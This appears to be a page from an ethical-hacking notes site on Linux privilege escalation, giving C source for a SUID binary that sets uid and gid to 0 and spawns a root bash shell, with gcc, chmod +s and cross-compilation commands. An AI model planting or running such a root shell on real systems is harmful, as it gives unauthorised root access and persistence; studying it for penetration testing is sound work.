> For the complete documentation index, see [llms.txt](https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking-concepts/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking-concepts/privilege-escalation/linux/vulnerabilities-exploit/general.md).

# General

### C code that spawns a root shell

To be ran as `sudo` or with `SUID` bit

***shell.c***

```c
#include <stdlib.h>
#include <unistd.h>

int main(){
 setgid(0); // set gid=0
 setuid(0); // set uid=0
 system("/bin/bash"); // spawns a shell as root
 return 0;
}
```

Compile with `gcc`, and relevant flags:

```bash
$ gcc shell.c -o shell
$ chmod +s shell
```

#### Cross-compiling for x86\_64 on an aarch64 machine (Raspberry PI)

```bash
$ sudo apt install gcc-x86-64-linux-gnu
$ x86_64-linux-gnu-gcc shell.c -o shell -static

$ file shell
shell: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked ...
```
